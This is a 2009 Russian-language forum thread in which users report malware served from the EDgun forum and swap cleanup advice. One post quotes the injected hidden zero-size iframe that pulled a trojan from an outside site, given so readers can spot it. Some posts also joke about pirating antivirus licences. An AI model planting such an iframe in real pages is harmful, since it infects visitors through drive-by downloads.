Guns.ru Talks
EDgun
Вирус! ( 1 )

вход | зарегистрироваться | поиск | реклама | картинки | календарь | поиск оружия, магазинов | фотоконкурсы | Аукцион
Автор
Тема: Вирус!
Evgeniy R
27-11-2009 12:53 Evgeniy R
На сайте Эдган точнее на форуме есть вирусяга!!! Так что у кого нет файрвола можите прилипнуть.

edit log

никитос
27-11-2009 13:29 никитос
Только что оттуда. Аваст молчит.
Gin.ru
27-11-2009 14:02 Gin.ru
Есть такое дело. Висит скрытый фрейм. Браузер ломится на script-meta09.com и качает оттуда пакость. Фу-ууу админам эганского форума...
Gin.ru
27-11-2009 14:04 Gin.ru
quote:
Originally posted by никитос:

Аваст молчит.

У меня KIS орёт, что идёт обращение к -http://script-meta09.com/index/aHere.class, который содержит Trojan-Downloader.Java.Agent.ab

edit log

Эдуард
27-11-2009 15:38 Эдуард
Все пофиксено еще вчера было.
Gin.ru
27-11-2009 17:59 Gin.ru
Значит после этого опять инфицировали форум
Fake
27-11-2009 19:48 Fake
Вот, похоже, из-за этого я вчера и занимался форматированием всех своих винтов на компе. Подцепил такую срань, что ни в сказке сказать, ни пером описать. Пля.
mavic
28-11-2009 00:50 mavic
Почистили уже? а то у меня лицензия на антивирь кончилась.
Gin.ru
28-11-2009 01:55 Gin.ru
quote:
Originally posted by mavic:

Почистили уже?


нет. Легко убедиться
Откройте исходный текст центральной страницы форума (в IE меню "Вид"-> Просмотр HTML-кода). Если на предпоследней строке увидите что-то типа

quote:
<iframe rsqdf='QmW7cFUR' src='http://mobi-sripts.com/s/in.cgi?6 ' ulmnu='JjfHev5B' width='0' height='0' стиль='display:none'></iframe>

значит пакость там. На момент, когда пишу эти строки - так и есть :<

Эйнштейн
28-11-2009 16:07 Эйнштейн
Протестил без фаервола, аваст поругался на один троян и один адэвэйр, но пропустил ещё два трояна.. Эти падлы заблокировали инет (через фаервол, кстати) и модифицировали некоторые драйвера от явы и звука. Лечится КьюрИтом из под АВЗгварда нормально, Но потом этим же авз надо проверить все библиотеки и дрова на подозрительные.
Fake
28-11-2009 18:02 Fake
Я словил какую-то гадость, которая вывесила поверх всех окон порнуху, которую назвала рекламной заставкой и предложила отправить СМС на номер 3649.
Заблокировала прописанный антивирус (Avira Anrivir), прописанную Оперу (ИЕ работал), квип.
Так же, заблокировала доступ к Диспетчеру файлов (ни три кнопки, ни вызов через коммандную строку не работали). Запущенные с флешки проги для просмотра запущенных процессов отрубались на лету (закрывались после открытия), запущенный с флешки антивирус успел только частично проверить комп, потом перезагрузка. Безопасный режим просто не грузится. Попытался прогрузится с сидюка с ДрВебом под линухом, не получилось. Толи руки кривы, толи еще что. Погоревал, погоревал и форматнул оба харда нахрен.
Раньше подобную хрень видел как надстройку к браузеру, а тут она самостоятельная стала. Работает независимо от всего.
Уррроды...
Эйнштейн
28-11-2009 23:38 Эйнштейн
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..
Fake
29-11-2009 00:00 Fake
quote:
Originally posted by Эйнштейн:
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Вот как раз AVZ оно и отлупляло но половине работы.

Эйнштейн
29-11-2009 00:13 Эйнштейн
Если включать AVZguard, то ничего вирус возразить уже не сможет
Fake
29-11-2009 00:24 Fake
quote:
Originally posted by Эйнштейн:

Если включать AVZguard, то ничего вирус возразить уже не сможет


А как его подключить? У меня эта закладка не активна. Скачал другую версию AVZ, та же история.

PS Вопрос отпал. Под ХР все работает.

edit log

Эйнштейн
29-11-2009 00:35 Эйнштейн
хз, версия 4.32, всё активно. Потом нужно выбрать второй пункт этого меню и оттуда запустить cureit
701 x 227
Fake
29-11-2009 00:41 Fake
Я его воткнул на старый ноут с МЕ. Под МЕ эти две закладки не активны.
Эйнштейн
29-11-2009 00:52 Эйнштейн
ну дык хр и милениум слишком разные просто, там другая версия проги требуется
unnamed13
29-11-2009 11:32 unnamed13
А на какие браузеры эта дрянь садиццо? Я вчера заходил с w7 через ff3.5.5 - не заметил ничего необычного. Из плагинов у меня только adblock+. За ie8 + smartscreen не скажу, но вроде чисто.

За линукс с ff/opera/chrome я спокоен, винда на еее живет второй ос. Отпишитесь кто чем поймал.

Fake
29-11-2009 13:41 Fake
У меня она сидела не на браузере. Включил комп, кликнул на антивирус и тут тебе окно на 2/3 экрана с порнухой и предлжением отправить СМС.

ЗЫ Винда ХР, Опера 10, Avira Antivir

miksa
29-11-2009 15:30 miksa
Вот тады мне объясните юзеру: ХР, Касперский, захожу на форум часто, очень часто. За прошедшие дни Каспер ни разу не руганулся! Окон, со всякой хренью не всплывало, тока комп стал слегка подтормаживать одно время, но в данный момент вроде всё нормально.
Полные проверки через Касперского делал - попросил удалить Куип (асю). Вирусняк, что выборочно приходит или он есть, тока я его не ощущаю?
unnamed13
29-11-2009 19:52 unnamed13
Видимо эта херь лезет если обновления не ставишь - типа дыры в системе.
У меня всё патченое-перепатченое - форточке лицензионно расово чистые.
Эйнштейн
29-11-2009 23:30 Эйнштейн
У меня всё рассово русское , скажите, форум уже переустановили? Ачкую заходить..
unnamed13
30-11-2009 11:24 unnamed13
29 обещались переустановить.
Gin.ru
30-11-2009 13:09 Gin.ru
quote:
Originally posted by Эйнштейн:

форум уже переустановили? Ачкую заходить..

не боись. Усё починили уже

Neznajka
3-12-2009 18:25 Neznajka
да, у меня тоже оттуда залез этот вирус.
вылезла хня какая то с просьбой прислать смс.
еле вычистил НОД32 с перезагрузкой и установкой даты на год назад.
теперь намано всё, но иногда броузер срубаеться.

в диспетчере висел как винагент вроде.

Эйнштейн
4-12-2009 18:29 Эйнштейн
Какбэ.. они снова лезут. win32.hllw.shadow.based & trojan.packed.16593
dizel-xp
5-12-2009 12:45 dizel-xp
Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера
Drivovich
9-12-2009 15:23 Drivovich
Вообще неплохо иногда проверять свой комп целиком какой ньть прогой типа CureIt! от Dr. Web или Virus removal tool От каспера. Желательно делать это в "SAFE MODE", а ещё лучше грузя систему с диска типа BARTPE или аналогичного LIVE CD. И не забываем обновлять систему - дыр в Винде ещё полным полно, если винда "серая", то качать обвновления можно отсюда - http://forum.oszone.net/thread-145420.html Удачи !
Exp10iT
11-12-2009 09:59 Exp10iT
quote:
Originally posted by dizel-xp:
Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера

-Видишь Суслика?
-Нет.
-И я нет, а он есть.

DiXXX
1-1-2010 02:50 DiXXX
quote:
Originally posted by никитос:
Только что оттуда. Аваст молчит.

У меня стоял аваст. А потом была бессонная ночь... Теперь стоит Кашпирофский ИС 2010, и много чего интересного повылезало https://forum.guns.ru/forummessage/169/567474.html Только STALKER стал подтормаживать, если антивирус не отключить.

КЕЙДЖ
1-1-2010 20:52 КЕЙДЖ
quote:
Originally posted by DiXXX:

Только STALKER стал подтормаживать, если антивирус не отключить.

если не через инет играешь то можешь антивирус отключить в сталкера рубанутся, потом опять каспера врубил и полез покорять просторы интернета :-) (а так без него в инет ни ни )
DiXXX
1-1-2010 21:11 DiXXX
quote:
Originally posted by КЕЙДЖ:

то можешь антивирус отключить в сталкера рубанутся,


Я так и делаю Кашпировский- весчь! 1600 только на год жаба душит, а ключ хрен найдешь... Беда-а.
DiXXX
1-1-2010 21:34 DiXXX
Я тут поизучал немного, если правильно понял каспер продается для установки на два компа. Этот гад собирает сведения о системе и передает при установке Кашпировскому лично . При попытке регистрации третьего компа юзер идет лесом. Это началось в КИС 2010

edit log

Шмулевич
4-1-2010 19:57 Шмулевич
Кажый день тот форум посещаю и ничего описанного не обнаружил.
Olegych33
5-1-2010 18:26 Olegych33
quote:
КЕЙДЖ

quote:
DiXXX

Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб. У меня все без проблем работает

КЕЙДЖ
5-1-2010 18:45 КЕЙДЖ
но уворовать то спортивнее
DiXXX
5-1-2010 21:45 DiXXX
quote:
Originally posted by КЕЙДЖ:

но уворовать то спортивнее


+1. Но, похоже, придется покупать...
quote:
Originally posted by Olegych33:

Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб.


Была такая мысль, но на месте Кашпировского я бы такого постарался не допустить. Может обновлялась не пробная тридцатидневная версия, а предыдущая лицензионная?
КЕЙДЖ
5-1-2010 22:06 КЕЙДЖ
а чего пробная версия не обновляется ? если обновляется то можно до бесконечности ставить и удалять, просто постоянно будет напоминать дай деньгу дай
DiXXX
5-1-2010 23:11 DiXXX
quote:
Originally posted by КЕЙДЖ:

а чего пробная версия не обновляется ?


Она работает только 30 дней, при этом естественно обновляется и т.д.. Второй раз ее на этот комп не поставить. Сейчас душу жену на 1600р.

Guns.ru Talks
EDgun
Вирус! ( 1 )